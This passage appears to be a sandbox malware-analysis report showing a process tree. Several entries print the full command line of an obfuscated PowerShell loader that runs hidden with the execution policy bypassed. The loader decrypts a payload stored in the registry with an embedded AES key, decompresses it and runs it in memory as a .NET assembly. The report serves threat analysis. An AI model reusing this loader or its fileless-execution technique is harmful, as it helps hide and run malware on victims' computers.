        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:5952
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        Hide Artifacts: Hidden Window
        
        PID:5404
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8096).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:9308
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8096" "3164" "3076" "3168" "0" "0" "3172" "0" "0" "0" "0" "0"
        27⤵
        
        PID:5728
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8432" "3124" "3044" "3128" "0" "0" "3132" "0" "0" "0" "0" "0"
        26⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:8196
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = 